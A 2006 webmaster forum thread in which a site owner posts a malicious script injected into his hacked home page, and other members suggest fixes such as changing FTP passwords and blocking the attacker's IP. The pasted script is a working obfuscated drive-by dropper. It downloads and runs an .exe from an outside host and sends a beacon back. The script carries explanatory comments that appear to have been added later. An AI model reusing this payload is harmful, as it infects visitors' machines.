kevinkap
Involved
Involved



Joined: Apr 22, 2006
Posts: 356

PostPosted: Wed Sep 13, 2006 1:58 pm Reply with quote

I have a site that is plain HTML. I keep finding a file called ftp_info.php in the public_html directory, and then my home page keeps turning up with JavaScript tags in it from ebayautionpros.net and from bidtrust.net. Both of them reference a .js file on the linked site. The one on the bidtrust site actually shows you the script, and it is this:
Code:
// Builds a "name=value; expires=...; path=...; domain=...; secure" cookie
// string. As rendered in this post the result is stored in the implicit
// global `bad_tag` (no var) and nothing is written to document.cookie in
// this function; getCookie() below reads `bad_tag` back. This looks like a
// transcribed or defanged copy of the sample — do not assume the script
// that was actually served used this variable.
function setCookie (name, value, expires, path, domain, secure) {

// escape() is the legacy encoder; only the value is percent-encoded, the
// optional attributes are appended verbatim when truthy.
bad_tag = name + "=" + escape(value) +
((expires) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}
// Looks up `name` in the cookie-format string held in the global `bad_tag`
// ("name=value; name2=value2 ...") and returns the unescape()d value, or
// null when the name is absent. A leading space is prepended to both the
// haystack and the needle so that "xname=" cannot match "name=".
// If `bad_tag` has never been assigned, the first line throws a
// ReferenceError instead of returning null.
function getCookie(name) {
var cookie = " " + bad_tag;
var search = " " + name + "=";
var setStr = null;
var offset = 0;
var end = 0;
// Always true because of the prepended space; kept from the original.
if (cookie.length > 0) {
offset = cookie.indexOf(search);
if (offset != -1) {
offset += search.length;
// The value runs to the next ";" or, failing that, to the end of the string.
end = cookie.indexOf(";", offset)
if (end == -1) {
end = cookie.length;
}
setStr = unescape(cookie.substring(offset, end));
}
}
return(setStr);
}
// Flattens every enumerable property of `obj` (own and inherited, via
// for-in) into one "name=value , name=value , ..." string. The sample calls
// it on `navigator` to turn the whole browser object — including the flags
// which_browser() stamps onto it — into a single fingerprint string.
function getProperties(obj) {
var properties = ''
for(var propName in obj)
properties += propName+"="+obj[propName]+" , "
return properties
}
// Browser fingerprinting. Stamps boolean version/capability flags onto the
// global `navigator` object (navigator.IE4..IE7, .NS4/.NS6, .OPERA/.OPERA5,
// .MAC, .DOM*, .detected) by sniffing navigator.appVersion / userAgent and
// probing for DOM entry points. Returns nothing; callers read the flags off
// `navigator`, and getProperties(navigator) later folds them into a string.
function which_browser(){
navigator.DOM=!!(document.getElementById?1:0)
navigator.OPERA=!!(window.opera)
navigator.OPERA5=!!(navigator.OPERA&&navigator.userAgent.indexOf("pera 5")>0)
// IE detection is by appVersion substring, gated on DOM support and on
// Opera not spoofing IE.
navigator.IE7=!!(navigator.appVersion.indexOf("IE 7")>0&&navigator.DOM&&!navigator.OPERA?1:0)
navigator.IE6=!!(navigator.appVersion.indexOf("IE 6")>0&&navigator.DOM&&!navigator.OPERA?1:0)
navigator.IE5=!!(navigator.appVersion.indexOf("IE 5")>0&&navigator.DOM&&!navigator.OPERA?1:0)
navigator.IE4=!!(document.all&&!navigator.DOM?1:0)
navigator.IE=!!(navigator.IE4||navigator.IE5||navigator.IE6||navigator.IE7)
navigator.MAC=!!(navigator.userAgent.indexOf("Mac")>0)
navigator.NS6=!!(navigator.DOM && parseInt(navigator.appVersion)>4?1:0)
navigator.NS4=!!(document.layers && !navigator.DOM?1:0)
navigator.DOMCORE1=!!(typeof(document.getElementsByTagName)!='undefined' && typeof(document.createElement)!='undefined')
navigator.DOMCORE2=!!(navigator.DOMCORE1 && typeof(document.getElementById) != 'undefined' && typeof(document.createElementNS) != 'undefined')
navigator.DOMHTML=!!(navigator.DOMCORE1 && typeof(document.getElementById) != 'undefined')
navigator.DOMCSS1=!!(navigator.NS6||navigator.IE)
// DOMCSS2 defaults to false and is re-derived below by probing whether a
// freshly created element exposes a style object.
navigator.DOMCSS2=!!(false)
if(navigator.DOMCORE1){
var element=document.createElement('p')
navigator.DOMCSS2=(typeof(element.style)=='object')
}
navigator.detected=(navigator.IE6||navigator.IE5||navigator.IE4||
navigator.NS6||navigator.NS4||
navigator.OPERA5||navigator.OPERA||
navigator.DOM)
}
// Drive-by script body (defender's annotation of the sample as posted).
// Step 1: fingerprint the visitor. Every enumerable navigator property —
// including the flags which_browser() just set — is flattened into one
// lowercase string and matched for OS version and cookie-support markers.
which_browser()
var agt=getProperties(navigator).toLowerCase()
var is_winme = ((agt.indexOf("win 9x 4.90")!=-1));
var is_win2k = ((agt.indexOf("windows nt 5.0")!=-1));
var is_winxp = ((agt.indexOf("windows nt 5.1")!=-1));
var is_win2k3 = ((agt.indexOf("windows nt 5.2")!=-1));
// Matches the navigator.cookieEnabled property once it has been flattened
// into the fingerprint string.
var is_cookie = ((agt.indexOf("cookieenabled=true")!=-1));
// Computed but not referenced anywhere in this listing.
var execute_wmf = is_winxp || is_win2k3;

// Step 2: gate delivery. Only cookie-enabled IE visitors proceed, and a
// marker cookie ("25425112357" = "41250190239", expiring Dec 2007) is set so
// that each victim receives the payload once. Note that as rendered here
// getCookie() reads the global `bad_tag` before setCookie() has ever assigned
// it, which would throw a ReferenceError on first visit — this copy of the
// sample appears to have been altered (the original presumably used
// document.cookie), so treat the rendering as defanged rather than exact.
if (is_cookie)
{
    if (navigator.IE)
    {
        var my_cookie = getCookie("25425112357");
        if (my_cookie != "41250190239")
        {
            setCookie("25425112357", "41250190239", "Mon, 01-Dec-2007 00:00:00 GMT", "/");

// Step 3: inject the payload. A %XX-encoded string is decoded with
// unescape() and written directly into the page via document.write(); it
// begins with an inline <script> element and is the actual dropper.
// Defenders: decode it only in an isolated analysis environment, and treat
// every host, path and file name it references as an indicator of
// compromise — the encoding is obfuscation, not encryption.
var var10010210259=unescape('%3C%73%63%72%69%70%74%3E%0D%0A%76%61%72%20%6F%62%6A%5F%52%44%53%20'+
'%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65'+
'%6E%74%28%27%6F%62%6A%65%63%74%27%29%3B%0D%0A%6F%62%6A%5F%52%44%53'+
'%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%27%6F%62'+
'%6A%5F%52%44%53%27%29%3B%0D%0A%6F%62%6A%5F%52%44%53%2E%73%65%74%41'+
'%74%74%72%69%62%75%74%65%28%27%63%6C%61%73%73%69%64%27%2C%27%63%6C'+
'%73%69%64%3A%42%44%39%36%43%35%35%36%2D%36%35%41%33%2D%31%31%44%30'+
'%2D%39%38%33%41%2D%30%30%43%30%34%46%43%32%39%45%33%36%27%29%3B%0D'+
'%0A%74%72%79%0D%0A%7B%0D%0A%76%61%72%20%6F%62%6A%5F%6D%73%78%6D%6C'+
'%32%20%3D%20%6F%62%6A%5F%52%44%53%2E%43%72%65%61%74%65%4F%62%6A%65'+
'%63%74%28%22%6D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50%22%2C%22%22'+
'%29%3B%0D%0A%6F%62%6A%5F%6D%73%78%6D%6C%32%2E%6F%70%65%6E%28%22%47'+
'%45%54%22%2C%22%68%74%74%70%3A%2F%2F%62%69%64%74%72%75%73%74%2E%6E'+
'%65%74%2F%67%2F%6E%65%77%62%75%69%6C%64%73%65%72%79%79%2E%65%78%65'+
'%22%2C%66%61%6C%73%65%29%3B%0D%0A%6F%62%6A%5F%6D%73%78%6D%6C%32%2E'+
'%73%65%6E%64%28%29%3B%0D%0A%76%61%72%20%6F%62%6A%5F%53%68%65%6C%6C'+
'%41%70%70%20%3D%20%6F%62%6A%5F%52%44%53%2E%43%72%65%61%74%65%4F%62'+
'%6A%65%63%74%28%22%53%68%65%6C%6C%2E%41%70%70%6C%69%63%61%74%69%6F'+
'%6E%22%2C%22%22%29%3B%0D%0A%76%61%72%20%6F%62%6A%5F%61%64%6F%64%62'+
'%20%3D%20%6F%62%6A%5F%52%44%53%2E%43%72%65%61%74%65%4F%62%6A%65%63'+
'%74%28%22%61%64%6F%64%62%2E%73%74%72%65%61%6D%22%2C%22%22%29%3B%0D'+
'%0A%6F%62%6A%5F%61%64%6F%64%62%2E%74%79%70%65%20%3D%20%31%3B%0D%0A'+
'%6F%62%6A%5F%61%64%6F%64%62%2E%6F%70%65%6E%28%29%3B%0D%0A%6F%62%6A'+
'%5F%61%64%6F%64%62%2E%57%72%69%74%65%28%6F%62%6A%5F%6D%73%78%6D%6C'+
'%32%2E%72%65%73%70%6F%6E%73%65%42%6F%64%79%29%3B%0D%0A%76%61%72%20'+
'%66%6E%20%3D%20%22%43%3A%5C%5C%31%37%36%35%36%31%37%39%32%32%36%2E'+
'%65%78%65%22%3B%0D%0A%6F%62%6A%5F%61%64%6F%64%62%2E%53%61%76%65%54'+
'%6F%46%69%6C%65%28%66%6E%2C%32%29%3B%0D%0A%6F%62%6A%5F%53%68%65%6C'+
'%6C%41%70%70%2E%53%68%65%6C%6C%45%78%65%63%75%74%65%28%66%6E%29%3B'+
'%0D%0A%7D%0D%0A%63%61%74%63%68%28%65%29%7B%7D%0D%0A%3C%2F%73%63%72'+
'%69%70%74%3E%0D%0A');
document.write(var10010210259);

// Step 4: report back. The second encoded string decodes to a hidden
// 0x0 <img> whose src points at the bidtrust.net host named in the post —
// a hit counter / infection beacon. Outbound requests to that host from
// clients are a usable detection signal in proxy or DNS logs.
var var37458745 =
   unescape(
   "%3C%69%6D%67%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%62%69%64%74%72%75%73%74%2E%6E%65%74%2F"+
   "%74%72%61%66%66%2F%63%6F%75%6E%74%65%72%2E%70%68%70%27%20%77%69%64%74%68%3D%30%20%68%65%69"+
   "%67%68%74%3D%30%3E"
   );
document.write(var37458745);
        }
    }
}


What is this, and how can I stop it? The index page has permissions 644.

Thanks, Kevin
 
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

PostPosted: Wed Sep 13, 2006 2:21 pm Reply with quote

It could be a hacker exploiting your system.

You are using HTML only? There are no other scripts running on it?

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
kevinkap







PostPosted: Wed Sep 13, 2006 2:24 pm Reply with quote

I guess I misspoke: it does use JS for navigation, no-right-click and the like, and there is also a Coppermine gallery on a different part of the site. The index page is all that has been messed with. I have found this twice in the past couple of weeks now; the bidtrust one was found only this second time. The site also uses FrontPage extensions.
 
fkelly
Former Moderator in Good Standing



Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

PostPosted: Wed Sep 13, 2006 2:52 pm Reply with quote

I would start by making sure that you don't have anonymous FTP enabled. Also, I'd look at any FTP accounts and make sure that I trust everyone to whom I've allocated them. I would also make sure that the passwords for all FTP accounts are changed and that they are hard to guess ... no using your pet's name or your own name ... you know the routine. If you have a web administration account, I'd change the password on that too and make it hard to guess (use a combination of letters, numbers and special characters, and not a word that's in the dictionary). Then I'd delete the file you mention and keep watching for its re-emergence.

You can also look through your logs and see if there is anything suspicious there, especially if you can narrow down the time when that file was put there.
 
kevinkap







PostPosted: Wed Sep 13, 2006 3:53 pm Reply with quote

I have located the IP of the person doing this from the FTP logs. Anonymous FTP is disabled, so how are they doing it?

This is the FTP log:

Sun Sep 03 01:09:54 2006 0 209.160.64.108 9243 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sun Sep 03 01:09:54 2006 0 209.160.64.108 9304 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sun Sep 03 01:09:54 2006 0 209.160.64.108 9304 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sun Sep 03 01:09:55 2006 0 209.160.64.108 9365 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sun Sep 03 13:01:31 2006 0 209.160.64.108 199 /home/myuser/ftp_info.php a _ i r myuser ftp 1 * c
Sun Sep 03 13:01:31 2006 0 209.160.64.108 199 /home/myuser/public_html/ftp_info.php a _ i r myuser ftp 1 * c
Sat Sep 09 01:47:28 2006 0 209.25.195.66 9365 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sat Sep 09 01:47:28 2006 0 209.25.195.66 9243 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sat Sep 09 01:47:29 2006 0 209.25.195.66 9243 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sat Sep 09 01:47:29 2006 0 209.25.195.66 9243 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sat Sep 09 05:38:09 2006 0 209.25.195.66 9243 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sat Sep 09 05:38:09 2006 0 209.25.195.66 9301 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sat Sep 09 05:38:10 2006 0 209.25.195.66 9301 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sat Sep 09 05:38:10 2006 0 209.25.195.66 9359 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sun Sep 10 00:34:40 2006 0 209.25.195.66 9359 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sun Sep 10 00:34:41 2006 0 209.25.195.66 9419 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sun Sep 10 00:34:41 2006 0 209.25.195.66 9419 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sun Sep 10 00:34:42 2006 0 209.25.195.66 9479 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c


So what do I do now?

Thanks, Kevin
 
evaders99







PostPosted: Wed Sep 13, 2006 4:03 pm Reply with quote

Coppermine could be the culprit. There may be other backdoors on your system; you would need to work with your host to find out. I don't know of another exploit that would affect the HTML files directly; perhaps they did something else, like target your web server software.
 
fkelly







PostPosted: Wed Sep 13, 2006 4:59 pm Reply with quote

As Evaders said it could be Coppermine.

Do you have FTP accounts set up? If so, I'd get rid of all but your own and change the password on that one. In the shared web hosting arrangement I'm familiar with (IPOWERWEB) the main admin account has control over the FTP accounts, and I'm pretty sure it's the same in a cPanel system.

I'd also add a
deny from 209.25.195.66
to my .htaccess file

Someone who knows more about servers than I do can probably say whether that will be effective against the type of attack shown in your log.
 
kevinkap







PostPosted: Wed Sep 13, 2006 5:44 pm Reply with quote

Thanks for the replies
 
technocrat
Life Cycles Becoming CPU Cycles



Joined: Jul 07, 2005
Posts: 511

PostPosted: Thu Sep 14, 2006 9:16 am Reply with quote

If files are showing up on your system, it could be any number of exploits. The currently popular ones are the phpBB admin XSS and the PHP 777 hack. Do you have the most current Sentinel version? Do you have any folders on your system that are CHMOD 777?

Are you using coppermine, spchat, or vwar?

_________________
Nuke-Evolution
phpBB-Evolution / phpBB-Evolution Blog 
kevinkap







PostPosted: Thu Sep 14, 2006 9:26 am Reply with quote

I have Coppermine. I have changed some folders that were 777 to 755 and made sure all files are 644. I am not using Nuke on the site. I have now had the IP blocked via APF.
 